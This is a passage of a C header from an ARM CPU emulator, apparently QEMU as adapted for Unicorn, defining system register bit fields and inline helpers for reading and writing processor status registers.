fp_exception_el(CPUARMState *env, int cur_el); int sve_exception_el(CPUARMState *env, int cur_el); uint32_t sve_zcr_len_for_el(CPUARMState *env, int el); static inline bool is_a64(CPUARMState *env) { return env->aarch64; } /* you can call this signal handler from your SIGBUS and SIGSEGV signal handlers to inform the virtual CPU of exceptions. non zero is returned if the signal was handled by the virtual CPU. */ int cpu_arm_signal_handler(int host_signum, void *pinfo, void *puc); /** * pmu_op_start/finish * @env: CPUARMState * * Convert all PMU counters between their delta form (the typical mode when * they are enabled) and the guest-visible values. These two calls must * surround any action which might affect the counters. */ void pmu_op_start(CPUARMState *env); void pmu_op_finish(CPUARMState *env); /* * Called when a PMU counter is due to overflow */ void arm_pmu_timer_cb(void *opaque); /** * Functions to register as EL change hooks for PMU mode filtering */ void pmu_pre_el_change(ARMCPU *cpu, void *ignored); void pmu_post_el_change(ARMCPU *cpu, void *ignored); /* * pmu_init * @cpu: ARMCPU * * Initialize the CPU's PMCEID[01]_EL0 registers and associated internal state * for the current configuration */ void pmu_init(ARMCPU *cpu); /* SCTLR bit meanings. Several bits have been reused in newer * versions of the architecture; in that case we define constants * for both old and new bit meanings. Code which tests against those * bits should probably check or otherwise arrange that the CPU * is the architectural version it expects. */ #define SCTLR_M (1U << 0) #define SCTLR_A (1U << 1) #define SCTLR_C (1U << 2) #define SCTLR_W (1U << 3) /* up to v6; RAO in v7 */ #define SCTLR_nTLSMD_32 (1U << 3) /* v8.2-LSMAOC, AArch32 only */ #define SCTLR_SA (1U << 3) /* AArch64 only */ #define SCTLR_P (1U << 4) /* up to v5; RAO in v6 and v7 */ #define SCTLR_LSMAOE_32 (1U << 4) /* v8.2-LSMAOC, AArch32 only */ #define SCTLR_SA0 (1U << 4) /* v8 onward, AArch64 only */ #define SCTLR_D (1U << 5) /* up to v5; RAO in v6 */ #define SCTLR_CP15BEN (1U << 5) /* v7 onward */ #define SCTLR_L (1U << 6) /* up to v5; RAO in v6 and v7; RAZ in v8 */ #define SCTLR_nAA (1U << 6) /* when v8.4-LSE is implemented */ #define SCTLR_B (1U << 7) /* up to v6; RAZ in v7 */ #define SCTLR_ITD (1U << 7) /* v8 onward */ #define SCTLR_S (1U << 8) /* up to v6; RAZ in v7 */ #define SCTLR_SED (1U << 8) /* v8 onward */ #define SCTLR_R (1U << 9) /* up to v6; RAZ in v7 */ #define SCTLR_UMA (1U << 9) /* v8 onward, AArch64 only */ #define SCTLR_F (1U << 10) /* up to v6 */ #define SCTLR_SW (1U << 10) /* v7 */ #define SCTLR_EnRCTX (1U << 10) /* in v8.0-PredInv */ #define SCTLR_Z (1U << 11) /* in v7, RES1 in v8 */ #define SCTLR_EOS (1U << 11) /* v8.5-ExS */ #define SCTLR_I (1U << 12) #define SCTLR_V (1U << 13) /* AArch32 only */ #define SCTLR_EnDB (1U << 13) /* v8.3, AArch64 only */ #define SCTLR_RR (1U << 14) /* up to v7 */ #define SCTLR_DZE (1U << 14) /* v8 onward, AArch64 only */ #define SCTLR_L4 (1U << 15) /* up to v6; RAZ in v7 */ #define SCTLR_UCT (1U << 15) /* v8 onward, AArch64 only */ #define SCTLR_DT (1U << 16) /* up to ??, RAO in v6 and v7 */ #define SCTLR_nTWI (1U << 16) /* v8 onward */ #define SCTLR_HA (1U << 17) /* up to v7, RES0 in v8 */ #define SCTLR_BR (1U << 17) /* PMSA only */ #define SCTLR_IT (1U << 18) /* up to ??, RAO in v6 and v7 */ #define SCTLR_nTWE (1U << 18) /* v8 onward */ #define SCTLR_WXN (1U << 19) #define SCTLR_ST (1U << 20) /* up to ??, RAZ in v6 */ #define SCTLR_UWXN (1U << 20) /* v7 onward, AArch32 only */ #define SCTLR_FI (1U << 21) /* up to v7, v8 RES0 */ #define SCTLR_IESB (1U << 21) /* v8.2-IESB, AArch64 only */ #define SCTLR_U (1U << 22) /* up to v6, RAO in v7 */ #define SCTLR_EIS (1U << 22) /* v8.5-ExS */ #define SCTLR_XP (1U << 23) /* up to v6; v7 onward RAO */ #define SCTLR_SPAN (1U << 23) /* v8.1-PAN */ #define SCTLR_VE (1U << 24) /* up to v7 */ #define SCTLR_E0E (1U << 24) /* v8 onward, AArch64 only */ #define SCTLR_EE (1U << 25) #define SCTLR_L2 (1U << 26) /* up to v6, RAZ in v7 */ #define SCTLR_UCI (1U << 26) /* v8 onward, AArch64 only */ #define SCTLR_NMFI (1U << 27) /* up to v7, RAZ in v7VE and v8 */ #define SCTLR_EnDA (1U << 27) /* v8.3, AArch64 only */ #define SCTLR_TRE (1U << 28) /* AArch32 only */ #define SCTLR_nTLSMD_64 (1U << 28) /* v8.2-LSMAOC, AArch64 only */ #define SCTLR_AFE (1U << 29) /* AArch32 only */ #define SCTLR_LSMAOE_64 (1U << 29) /* v8.2-LSMAOC, AArch64 only */ #define SCTLR_TE (1U << 30) /* AArch32 only */ #define SCTLR_EnIB (1U << 30) /* v8.3, AArch64 only */ #define SCTLR_EnIA (1U << 31) /* v8.3, AArch64 only */ #define SCTLR_BT0 (1ULL << 35) /* v8.5-BTI */ #define SCTLR_BT1 (1ULL << 36) /* v8.5-BTI */ #define SCTLR_ITFSB (1ULL << 37) /* v8.5-MemTag */ #define SCTLR_TCF0 (3ULL << 38) /* v8.5-MemTag */ #define SCTLR_TCF (3ULL << 40) /* v8.5-MemTag */ #define SCTLR_ATA0 (1ULL << 42) /* v8.5-MemTag */ #define SCTLR_ATA (1ULL << 43) /* v8.5-MemTag */ #define SCTLR_DSSBS (1ULL << 44) /* v8.5 */ #define CPTR_TCPAC (1U << 31) #define CPTR_TTA (1U << 20) #define CPTR_TFP (1U << 10) #define CPTR_TZ (1U << 8) /* CPTR_EL2 */ #define CPTR_EZ (1U << 8) /* CPTR_EL3 */ #define MDCR_EPMAD (1U << 21) #define MDCR_EDAD (1U << 20) #define MDCR_SPME (1U << 17) /* MDCR_EL3 */ #define MDCR_HPMD (1U << 17) /* MDCR_EL2 */ #define MDCR_SDD (1U << 16) #define MDCR_SPD (3U << 14) #define MDCR_TDRA (1U << 11) #define MDCR_TDOSA (1U << 10) #define MDCR_TDA (1U << 9) #define MDCR_TDE (1U << 8) #define MDCR_HPME (1U << 7) #define MDCR_TPM (1U << 6) #define MDCR_TPMCR (1U << 5) #define MDCR_HPMN (0x1fU) /* Not all of the MDCR_EL3 bits are present in the 32-bit SDCR */ #define SDCR_VALID_MASK (MDCR_EPMAD | MDCR_EDAD | MDCR_SPME | MDCR_SPD) #define CPSR_M (0x1fU) #define CPSR_T (1U << 5) #define CPSR_F (1U << 6) #define CPSR_I (1U << 7) #define CPSR_A (1U << 8) #define CPSR_E (1U << 9) #define CPSR_IT_2_7 (0xfc00U) #define CPSR_GE (0xfU << 16) #define CPSR_IL (1U << 20) #define CPSR_PAN (1U << 22) #define CPSR_J (1U << 24) #define CPSR_IT_0_1 (3U << 25) #define CPSR_Q (1U << 27) #define CPSR_V (1U << 28) #define CPSR_C (1U << 29) #define CPSR_Z (1U << 30) #define CPSR_N (1U << 31) #define CPSR_NZCV (CPSR_N | CPSR_Z | CPSR_C | CPSR_V) #define CPSR_AIF (CPSR_A | CPSR_I | CPSR_F) #define CPSR_IT (CPSR_IT_0_1 | CPSR_IT_2_7) #define CACHED_CPSR_BITS (CPSR_T | CPSR_AIF | CPSR_GE | CPSR_IT | CPSR_Q \ | CPSR_NZCV) /* Bits writable in user mode. */ #define CPSR_USER (CPSR_NZCV | CPSR_Q | CPSR_GE) /* Execution state bits. MRS read as zero, MSR writes ignored. */ #define CPSR_EXEC (CPSR_T | CPSR_IT | CPSR_J | CPSR_IL) /* Bit definitions for M profile XPSR. Most are the same as CPSR. */ #define XPSR_EXCP 0x1ffU #define XPSR_SPREALIGN (1U << 9) /* Only set in exception stack frames */ #define XPSR_IT_2_7 CPSR_IT_2_7 #define XPSR_GE CPSR_GE #define XPSR_SFPA (1U << 20) /* Only set in exception stack frames */ #define XPSR_T (1U << 24) /* Not the same as CPSR_T ! */ #define XPSR_IT_0_1 CPSR_IT_0_1 #define XPSR_Q CPSR_Q #define XPSR_V CPSR_V #define XPSR_C CPSR_C #define XPSR_Z CPSR_Z #define XPSR_N CPSR_N #define XPSR_NZCV CPSR_NZCV #define XPSR_IT CPSR_IT #define TTBCR_N (7U << 0) /* TTBCR.EAE==0 */ #define TTBCR_T0SZ (7U << 0) /* TTBCR.EAE==1 */ #define TTBCR_PD0 (1U << 4) #define TTBCR_PD1 (1U << 5) #define TTBCR_EPD0 (1U << 7) #define TTBCR_IRGN0 (3U << 8) #define TTBCR_ORGN0 (3U << 10) #define TTBCR_SH0 (3U << 12) #define TTBCR_T1SZ (3U << 16) #define TTBCR_A1 (1U << 22) #define TTBCR_EPD1 (1U << 23) #define TTBCR_IRGN1 (3U << 24) #define TTBCR_ORGN1 (3U << 26) #define TTBCR_SH1 (1U << 28) #define TTBCR_EAE (1U << 31) /* Bit definitions for ARMv8 SPSR (PSTATE) format. * Only these are valid when in AArch64 mode; in * AArch32 mode SPSRs are basically CPSR-format. */ #define PSTATE_SP (1U) #define PSTATE_M (0xFU) #define PSTATE_nRW (1U << 4) #define PSTATE_F (1U << 6) #define PSTATE_I (1U << 7) #define PSTATE_A (1U << 8) #define PSTATE_D (1U << 9) #define PSTATE_BTYPE (3U << 10) #define PSTATE_IL (1U << 20) #define PSTATE_SS (1U << 21) #define PSTATE_PAN (1U << 22) #define PSTATE_UAO (1U << 23) #define PSTATE_V (1U << 28) #define PSTATE_C (1U << 29) #define PSTATE_Z (1U << 30) #define PSTATE_N (1U << 31) #define PSTATE_NZCV (PSTATE_N | PSTATE_Z | PSTATE_C | PSTATE_V) #define PSTATE_DAIF (PSTATE_D | PSTATE_A | PSTATE_I | PSTATE_F) #define CACHED_PSTATE_BITS (PSTATE_NZCV | PSTATE_DAIF | PSTATE_BTYPE) /* Mode values for AArch64 */ #define PSTATE_MODE_EL3h 13 #define PSTATE_MODE_EL3t 12 #define PSTATE_MODE_EL2h 9 #define PSTATE_MODE_EL2t 8 #define PSTATE_MODE_EL1h 5 #define PSTATE_MODE_EL1t 4 #define PSTATE_MODE_EL0t 0 /* Write a new value to v7m.exception, thus transitioning into or out * of Handler mode; this may result in a change of active stack pointer. */ void write_v7m_exception(CPUARMState *env, uint32_t new_exc); /* Map EL and handler into a PSTATE_MODE. */ static inline unsigned int aarch64_pstate_mode(unsigned int el, bool handler) { return (el << 2) | handler; } /* Return the current PSTATE value. For the moment we don't support 32<->64 bit * interprocessing, so we don't attempt to sync with the cpsr state used by * the 32 bit decoder. */ static inline uint32_t pstate_read(CPUARMState *env) { int ZF; ZF = (env->ZF == 0); return (env->NF & 0x80000000) | (ZF << 30) | (env->CF << 29) | ((env->VF & 0x80000000) >> 3) | env->pstate | env->daif | (env->btype << 10); } static inline void pstate_write(CPUARMState *env, uint32_t val) { env->ZF = (~val) & PSTATE_Z; env->NF = val; env->CF = (val >> 29) & 1; env->VF = (val << 3) & 0x80000000; env->daif = val & PSTATE_DAIF; env->btype = (val >> 10) & 3; env->pstate = val & ~CACHED_PSTATE_BITS; } /* Return the current CPSR value. */ uint32_t cpsr_read(CPUARMState *env); typedef enum CPSRWriteType { CPSRWriteByInstr = 0, /* from guest MSR or CPS */ CPSRWriteExceptionReturn = 1, /* from guest exception return insn */ CPSRWriteRaw = 2, /* trust values, do not switch reg banks */ CPSRWriteByGDBStub = 3, /* from the GDB stub */ CPSRWriteByUnicorn = 4 /* from uc_reg_write */ } CPSRWriteType; /* Set the CPSR. Note that some bits of mask must be all-set or all-clear.*/ void cpsr_write(CPUARMState *env, uint32_t val, uint32_t mask, CPSRWriteType write_type); /* Return the current xPSR value. */ static inline uint32_t xpsr_read(CPUARMState *env) { int ZF; ZF = (env->ZF == 0); return (env->NF & 0x80000000) | (ZF << 30) | (env->CF << 29) | ((env->VF & 0x80000000) >> 3) | (env->QF << 27) | (env->thumb << 24) | ((env->condexec_bits & 3) << 25) | ((env->condexec_bits & 0xfc) << 8) | (env->GE << 16) | env->v7m.exception; } /* Set the xPSR. Note that some bits of mask must be all-set or all-clear. */ static inline void xpsr_write(CPUARMState *env, uint32_t val, uint32_t mask) { if (mask & XPSR_NZCV) { env->ZF = (~val) & XPSR_Z; env->NF = val; env->CF = (val >> 29) & 1; env->VF = (val << 3) & 0x80000000; } if (mask & XPSR_Q) { env->QF = ((val & XPSR_Q) != 0); } if (mask & XPSR_GE) { env->GE = (val & XPSR_GE) >> 16; } if (mask & XPSR_T) { env->thumb = ((val & XPSR_T) != 0); } if (mask & XPSR_IT_0_1) { env->condexec_bits &= ~3; env->condexec_bits |= (val >> 25) & 3; } if (mask & XPSR_IT_2_7) { env->condexec_bits &= 3; env->condexec_bits |= (val >> 8) & 0xfc; } if (mask & XPSR_EXCP) { /* Note that this only happens on exception exit */ write_v7m_exception(env, val & XPSR_EXCP); } } #define HCR_VM (1ULL << 0) #define HCR_SWIO (1ULL << 1) #define HCR_PTW (1ULL << 2) #define HCR_FMO (1ULL << 3) #define HCR_IMO (1ULL << 4) #define HCR_AMO (1ULL << 5) #define HCR_VF (1ULL << 6) #define HCR_VI (1ULL << 7) #define HCR_VSE (1ULL << 8) #define HCR_FB (1ULL << 9) #define HCR_BSU_MASK (3ULL << 10) #define HCR_DC (1ULL << 12) #define HCR_TWI (1ULL << 13) #define HCR_TWE (1ULL << 14) #define HCR_TID0 (1ULL << 15) #define HCR_TID1 (1ULL << 16) #define HCR_TID2 (1ULL << 17) #define HCR_TID3 (1ULL << 18) #define HCR_TSC (1ULL << 19) #define HCR_TIDCP (1ULL << 20) #define HCR_TACR (1ULL << 21) #define HCR_TSW (1ULL << 22) #define HCR_TPCP (1ULL << 23) #define HCR_TPU (1ULL << 24) #define HCR_TTLB (1ULL << 25) #define HCR_TVM (1ULL << 26) #define HCR_TGE (1ULL << 27) #define HCR_TDZ (1ULL << 28) #define HCR_HCD (1ULL << 29) #define HCR_TRVM (1ULL << 30) #define HCR_RW (1ULL << 31) #define HCR_CD (1ULL << 32) #define HCR_ID (1ULL << 33) #define HCR_E2H (1ULL << 34) #define HCR_TLOR (1ULL << 35) #define HCR_TERR (1ULL << 36) #define HCR_TEA (1ULL << 37) #define HCR_MIOCNCE (1ULL << 38) /* RES0 bit 39 */ #define HCR_APK (1ULL << 40) #define HCR_API (1ULL << 41) #define HCR_NV (1ULL << 42) #define HCR_NV1 (1ULL << 43) #define HCR_AT (1ULL << 44) #define HCR_NV2 (1ULL << 45) #define HCR_FWB (1ULL << 46) #define HCR_FIEN (1ULL << 47) /* RES0 bit 48 */ #define HCR_TID4 (1ULL << 49) #define HCR_TICAB (1ULL << 50) #define HCR_AMVOFFEN (1ULL << 51) #define HCR_TOCU (1ULL << 52) #define HCR_ENSCXT (1ULL << 53) #define HCR_TTLBIS (1ULL << 54) #define HCR_TTLBOS (1ULL << 55) #define HCR_ATA (1ULL << 56) #define HCR_DCT (1ULL << 57) #define HCR_TID5 (1ULL << 58) #define HCR_TWEDEN (1ULL << 59) #define HCR_TWEDEL MAKE_64BIT_MASK(60, 4) #define SCR_NS (1U << 0) #define SCR_IRQ (1U << 1) #define SCR_FIQ (1U << 2) #define SCR_EA (1U << 3) #define SCR_FW (1U << 4) #define SCR_AW (1U << 5) #define SCR_NET (1U << 6) #define SCR_SMD (1U << 7) #define SCR_HCE (1U << 8) #define SCR_SIF (1U << 9) #define SCR_RW (1U << 10) #define SCR_ST (1U << 11) #define SCR_TWI (1U << 12) #define SCR_TWE (1U << 13) #define SCR_TLOR (1U << 14) #define SCR_TERR (1U << 15) #define SCR_APK (1U << 16) #define SCR_API (1U << 17) #define SCR_EEL2 (1U << 18) #define SCR_EASE (1U << 19) #define SCR_NMEA (1U << 20) #define SCR_FIEN (1U << 21) #define SCR_ENSCXT (1U << 25) #define SCR_ATA (1U << 26) /* Return the current FPSCR value. */ uint32_t vfp_get_fpscr(CPUARMState *env); void vfp_set_fpscr(CPUARMState *env, uint32_t val); /* FPCR, Floating Point Control Register * FPSR, Floating Poiht Status Register * * For A64 the FPSCR is split into two logically distinct registers, * FPCR and FPSR. However since they still use non-overlapping bits * we store the underlying state in fpscr and just mask on read/write. */ #define FPSR_MASK 0xf800009f #define FPCR_MASK 0x07ff9f00 #define FPCR_IOE (1 << 8) /* Invalid Operation exception trap enable */ #define FPCR_DZE (1 << 9) /* Divide by Zero exception trap enable */ #define FPCR_OFE (1 << 10) /* Overflow exception trap enable */ #define FPCR_UFE (1 << 11) /* Underflow exception trap enable */ #define FPCR_IXE (1 << 12) /* Inexact exception trap enable */ #define FPCR_IDE (1 << 15) /* Input Denormal exception trap enable */ #define FPCR_FZ16 (1 << 19) /* ARMv8.2+, FP16 flush-to-zero */ #define FPCR_FZ (1 << 24) /* Flush-to-zero enable bit */ #define FPCR_DN (1 << 25) /* Default NaN enable bit */ #define FPCR_QC (1 << 27) /* Cumulative saturation bit */ static inline uint32_t vfp_get_fpsr(CPUARMState *env) { return vfp_get_fpscr(env) & FPSR_MASK; } static inline void vfp_set_fpsr(CPUARMState *env, uint32_t val) { uint32_t new_fpscr = (vfp_get_fpscr(env) & ~FPSR_MASK) | (val & FPSR_MASK); vfp_set_fpscr(env, new_fpscr); } static inline uint32_t vfp_get_fpcr(CPUARMState *env) { return vfp_get_fpscr(env) & FPCR_MASK; } static inline void vfp_set_fpcr(CPUARMState *env, uint32_t val) { uint32_t new_fpscr = (vfp_get_fpscr(env) & ~FPCR_MASK) | (val & FPCR_MASK); vfp_set_fpscr(env, new_fpscr); } enum arm_cpu_mode { ARM_CPU_MODE_USR = 0x10, ARM_CPU_MODE_FIQ = 0x11, ARM_CPU_MODE_IRQ = 0x12, ARM_CPU_MODE_SVC = 0x13, ARM_CPU_MODE_MON = 0x16, ARM_CPU_MODE_ABT = 0x17, ARM_CPU_MODE_HYP = 0x1a, ARM_CPU_MODE_UND = 0x1b, ARM_CPU_MODE_SYS = 0x1f }; /* VFP system registers. */ #define ARM_VFP_FPSID 0 #define ARM_VFP_FPSCR 1 #define ARM_VFP_MVFR2 5 #define ARM_VFP_MVFR1 6 #define ARM_VFP_MVFR0 7 #define ARM_VFP_FPEXC 8 #define ARM_VFP_FPINST 9 #define ARM_VFP_FPINST2 10 /* iwMMXt coprocessor control registers. */ #define ARM_IWMMXT_wCID 0 #define ARM_IWMMXT_wCon 1 #define ARM_IWMMXT_wCSSF 2 #define ARM_IWMMXT_wCASF 3 #define ARM_IWMMXT_wCGR0 8 #define ARM_IWMMXT_wCGR1 9 #define ARM_IWMMXT_wCGR2 10 #define ARM_IWMMXT_wCGR3 11 /* V7M CCR bits */ FIELD(V7M_CCR, NONBASETHRDENA, 0, 1) FIELD(V7M_CCR, USERSETMPEND, 1, 1) FIELD(V7M_CCR, UNALIGN_TRP, 3, 1) FIELD(V7M_CCR, DIV_0_TRP, 4, 1) FIELD(V7M_CCR, BFHFNMIGN, 8, 1) FIELD(V7M_CCR, STKALIGN, 9, 1) FIELD(V7M_CCR, STKOFHFNMIGN, 10, 1) FIELD(V7M_CCR, DC, 16, 1) FIELD(V7M_CCR, IC, 17, 1) FIELD(V7M_CCR, BP, 18, 1) /* V7M SCR bits */ FIELD(V7M_SCR, SLEEPONEXIT, 1, 1) FIELD(V7M_SCR, SLEEPDEEP, 2, 1) FIELD(V7M_SCR, SLEEPDEEPS, 3, 1) FIELD(V7M_SCR, SEVONPEND, 4, 1) /* V7M AIRCR bits */ FIELD(V7M_AIRCR, VECTRESET, 0, 1) FIELD(V7M_AIRCR, VECTCLRACTIVE, 1, 1) FIELD(V7M_AIRCR, SYSRESETREQ, 2, 1) FIELD(V7M_AIRCR, SYSRESETREQS, 3, 1) FIELD(V7M_AIRCR, PRIGROUP, 8, 3) FIELD(V7M_AIRCR, BFHFNMINS, 13, 1) FIELD(V7M_AIRCR, PRIS, 14, 1) FIELD(V7M_AIRCR, ENDIANNESS, 15, 1) FIELD(V7M_AIRCR, VECTKEY, 16, 16) /* V7M CFSR bits for MMFSR */ FIELD(V7M_CFSR, IACCVIOL, 0, 1) FIELD(V7M_CFSR, DACCVIOL, 1, 1) FIELD(V7M_CFSR, MUNSTKERR, 3, 1) FIELD(V7M_CFSR, MSTKERR, 4, 1) FIELD(V7M_CFSR, MLSPERR, 5, 1) FIELD(V7M_CFSR, MMARVALID, 7, 1) /* V7M CFSR bits for BFSR */ FIELD(V7M_CFSR, IBUSERR, 8 + 0, 1) FIELD(V7M_CFSR, PRECISERR, 8 + 1, 1) FIELD(V7M_CFSR, IMPRECISERR, 8 + 2, 1) FIELD(V7M_CFSR, UNSTKERR, 8 + 3, 1) FIELD(V7M_CFSR, STKERR, 8 + 4, 1) FIELD(V7M_CFSR, LSPERR, 8 + 5, 1) FIELD(V7M_CFSR, BFARVALID, 8 + 7, 1) /* V7M CFSR bits for UFSR */ FIELD(V7M_CFSR, UNDEFINSTR, 16 + 0, 1) FIELD(V7M_CFSR, INVSTATE, 16 + 1, 1) FIELD(V7M_CFSR, INVPC, 16 + 2, 1) FIELD(V7M_CFSR, NOCP, 16 + 3, 1) FIELD(V7M_CFSR, STKOF, 16 + 4, 1) FIELD(V7M_CFSR, UNALIGNED, 16 + 8, 1) FIELD(V7M_CFSR, DIVBYZERO, 16 + 9, 1) /* V7M CFSR bit masks covering all of the subregister bits */ FIELD(V7M_CFSR, MMFSR, 0, 8) FIELD(V7M_CFSR, BFSR, 8, 8) FIELD(V7M_CFSR, UFSR, 16, 16) /* V7M HFSR bits */ FIELD(V7M_HFSR, VECTTBL, 1, 1) FIELD(V7M_HFSR, FORCED, 30, 1) FIELD(V7M_HFSR, DEBUGEVT, 31, 1) /* V7M DFSR bits */ FIELD(V7M_DFSR, HALTED, 0, 1) FIELD(V7M_DFSR, BKPT, 1, 1) FIELD(V7M_DFSR, DWTTRAP, 2, 1) FIELD(V7M_DFSR, VCATCH, 3, 1) FIELD(V7M_DFSR, EXTERNAL, 4, 1) /* V7M SFSR bits */ FIELD(V7M_SFSR, INVEP, 0, 1) FIELD(V7M_SFSR, INVIS, 1, 1) FIELD(V7M_SFSR, INVER, 2, 1) FIELD(V7M_SFSR, AUVIOL, 3, 1) FIELD(V7M_SFSR, INVTRAN, 4, 1) FIELD(V7M_SFSR, LSPERR, 5, 1) FIELD(V7M_SFSR, SFARVALID, 6, 1) FIELD(V7M_SFSR, LSERR, 7, 1) /* v7M MPU_CTRL bits */ FIELD(V7M_MPU_CTRL, ENABLE, 0, 1) FIELD(V7M_MPU_CTRL, HFNMIENA, 1, 1) FIELD(V7M_MPU_CTRL, PRIVDEFENA, 2, 1) /* v7M CLIDR bits */ FIELD(V7M_CLIDR, CTYPE_ALL, 0, 21) FIELD(V7M_CLIDR, LOUIS, 21, 3) FIELD(V7M_CLIDR, LOC, 24, 3) FIELD(V7M_CLIDR, LOUU, 27, 3) FIELD(V7M_CLIDR, ICB, 30, 2) FIELD(V7M_CSSELR, IND, 0, 1) FIELD(V7M_CSSELR, LEVEL, 1, 3) /* We use the combination of InD and Level to index into cpu->ccsidr[]; * define a mask for this and check that it doesn't permit running off * the end of the array. */ FIELD(V7M_CSSELR, INDEX, 0, 4) /* v7M FPCCR bits */ FIELD(V7M_FPCCR, LSPACT, 0, 1) FIELD(V7M_FPCCR, USER, 1, 1) FIELD(V7M_FPCCR, S, 2, 1) FIELD(V7M_FPCCR, THREAD, 3, 1) FIELD(V7M_FPCCR, HFRDY, 4, 1) FIELD(V7M_FPCCR, MMRDY, 5, 1) FIELD(V7M_FPCCR, BFRDY, 6, 1) FIELD(V7M_FPCCR, SFRDY, 7, 1) FIELD(V7M_FPCCR, MONRDY, 8, 1) FIELD(V7M_FPCCR, SPLIMVIOL, 9, 1) FIELD(V7M_FPCCR, UFRDY, 10, 1) FIELD(V7M_FPCCR, RES0, 11, 15) FIELD(V7M_FPCCR, TS, 26, 1) FIELD(V7M_FPCCR, CLRONRETS, 27, 1) FIELD(V7M_FPCCR, CLRONRET, 28, 1) FIELD(V7M_FPCCR, LSPENS, 29, 1) FIELD(V7M_FPCCR, LSPEN, 30, 1) FIELD(V7M_FPCCR, ASPEN, 31, 1) /* These bits are banked. Others are non-banked and live in the M_REG_S bank */ #define R_V7M_FPCCR_BANKED_MASK \ (R_V7M_FPCCR_LSPACT_MASK | \ R_V7M_FPCCR_USER_MASK | \ R_V7M_FPCCR_THREAD_MASK | \ R_V7M_FPCCR_MMRDY_MASK | \ R_V7M_FPCCR_SPLIMVIOL_MASK | \ R_V7M_FPCCR_UFRDY_MASK | \ R_V7M_FPCCR_ASPEN_MASK) /* * System register ID fields. */ FIELD(MIDR_EL1, REVISION, 0, 4) FIELD(MIDR_EL1, PARTNUM, 4, 12) FIELD(MIDR_EL1, ARCHITECTURE, 16, 4) FIELD(MIDR_EL1, VARIANT, 20, 4) FIELD(MIDR_EL1, IMPLEMENTER, 24, 8) FIELD(ID_ISAR0, SWAP, 0, 4) FIELD(ID_ISAR0, BITCOUNT, 4, 4) FIELD(ID_ISAR0, BITFIELD, 8, 4) FIELD(ID_ISAR0, CMPBRANCH, 12, 4) FIELD(ID_ISAR0, COPROC, 16, 4) FIELD(ID_ISAR0, DEBUG, 20, 4) FIELD(ID_ISAR0, DIVIDE, 24, 4) FIELD(ID_ISAR1, ENDIAN, 0, 4) FIELD(ID_ISAR1, EXCEPT, 4, 4) FIELD(ID_ISAR1, EXCEPT_AR, 8, 4) FIELD(ID_ISAR1, EXTEND, 12, 4) FIELD(ID_ISAR1, IFTHEN, 16, 4) FIELD(ID_ISAR1, IMMEDIATE, 20, 4) FIELD(ID_ISAR1, INTERWORK, 24, 4) FIELD(ID_ISAR1, JAZELLE, 28, 4) FIELD(ID_ISAR2, LOADSTORE, 0, 4) FIELD(ID_ISAR2, MEMHINT, 4, 4) FIELD(ID_ISAR2, MULTIACCESSINT, 8, 4) FIELD(ID_ISAR2, MULT, 12, 4) FIELD(ID_ISAR2, MULTS, 16, 4) FIELD(ID_ISAR2, MULTU, 20, 4) FIELD(ID_ISAR2, PSR_AR, 24, 4) FIELD(ID_ISAR2, REVERSAL, 28, 4) FIELD(ID_ISAR3, SATURATE, 0, 4) FIELD(ID_ISAR3, SIMD, 4, 4) FIELD(ID_ISAR3, SVC, 8, 4) FIELD(ID_ISAR3, SYNCHPRIM, 12, 4) FIELD(ID_ISAR3, TABBRANCH, 16, 4) FIELD(ID_ISAR3, T32COPY, 20, 4) FIELD(ID_ISAR3, TRUENOP, 24, 4) FIELD(ID_ISAR3, T32EE, 28, 4) FIELD(ID_ISAR4, UNPRIV, 0, 4) FIELD(ID_ISAR4, WITHSHIFTS, 4, 4) FIELD(ID_ISAR4, WRITEBACK, 8, 4) FIELD(ID_ISAR4, SMC, 12, 4) FIELD(ID_ISAR4, BARRIER, 16, 4) FIELD(ID_ISAR4, SYNCHPRIM_FRAC, 20, 4) FIELD(ID_ISAR4, PSR_M, 24, 4) FIELD(ID_ISAR4, SWP_FRAC, 28, 4) FIELD(ID_ISAR5, SEVL, 0, 4) FIELD(ID_ISAR5, AES, 4, 4) FIELD(ID_ISAR5, SHA1, 8, 4) FIELD(ID_ISAR5, SHA2, 12, 4) FIELD(ID_ISAR5, CRC32, 16, 4) FIELD(ID_ISAR5, RDM, 24, 4) FIELD(ID_ISAR5, VCMA, 28, 4) FIELD(ID_ISAR6, JSCVT, 0, 4) FIELD(ID_ISAR6, DP, 4, 4) FIELD(ID_ISAR6, FHM, 8, 4) FIELD(ID_ISAR6, SB, 12, 4) FIELD(ID_ISAR6, SPECRES, 16, 4) FIELD(ID_MMFR3, CMAINTVA, 0, 4) FIELD(ID_MMFR3, CMAINTSW, 4, 4) FIELD(ID_MMFR3, BPMAINT, 8, 4) FIELD(ID_MMFR3, MAINTBCST, 12, 4) FIELD(ID_MMFR3, PAN, 16, 4) FIELD(ID_MMFR3, COHWALK, 20, 4) FIELD(ID_MMFR3, CMEMSZ, 24, 4) FIELD(ID_MMFR3, SUPERSEC, 28, 4) FIELD(ID_MMFR4, SPECSEI, 0, 4) FIELD(ID_MMFR4, AC2, 4, 4) FIELD(ID_MMFR4, XNX, 8, 4) FIELD(ID_MMFR4, CNP, 12, 4) FIELD(ID_MMFR4, HPDS, 16, 4) FIELD(ID_MMFR4, LSM, 20, 4) FIELD(ID_MMFR4, CCIDX, 24, 4) FIELD(ID_MMFR4, EVT, 28, 4) FIELD(ID_AA64ISAR0, AES, 4, 4) FIELD(ID_AA64ISAR0, SHA1, 8, 4) FIELD(ID_AA64ISAR0, SHA2, 12, 4) FIELD(ID_AA64ISAR0, CRC32, 16, 4) FIELD(ID_AA64ISAR0, ATOMIC, 20, 4) FIELD(ID_AA64ISAR0, RDM, 28, 4) #ifdef _MSC_VER /* warning C4309: 'initializing': truncation of constant value. enum is 32bit in MSVC. */ #define R_ID_AA64ISAR0_SHA3_SHIFT 32 #define R_ID_AA64ISAR0_SHA3_LENGTH 4 #define R_ID_AA64ISAR0_SHA3_MASK MAKE_64BIT_MASK(R_ID_AA64ISAR0_SHA3_SHIFT, R_ID_AA64ISAR0_SHA3_LENGTH) #define R_ID_AA64ISAR0_SM3_SHIFT 36 #define R_ID_AA64ISAR0_SM3_LENGTH 4 #define R_ID_AA64ISAR0_SM3_MASK MAKE_64BIT_MASK(R_ID_AA64ISAR0_SM3_SHIFT, R_ID_AA64ISAR0_SM3_LENGTH) #define R_ID_AA64ISAR0_SM4_SHIFT 40 #define R_ID_AA64ISAR0_SM4_LENGTH 4 #define R_ID_AA64ISAR0_SM4_MASK MAKE_64BIT_MASK(R_ID_AA64ISAR0_SM4_SHIFT, R_ID_AA64ISAR0_SM4_LENGTH) #define R_ID_AA64ISAR0_DP_SHIFT 44 #define R_ID_AA64ISAR0_DP_LENGTH 4 #define 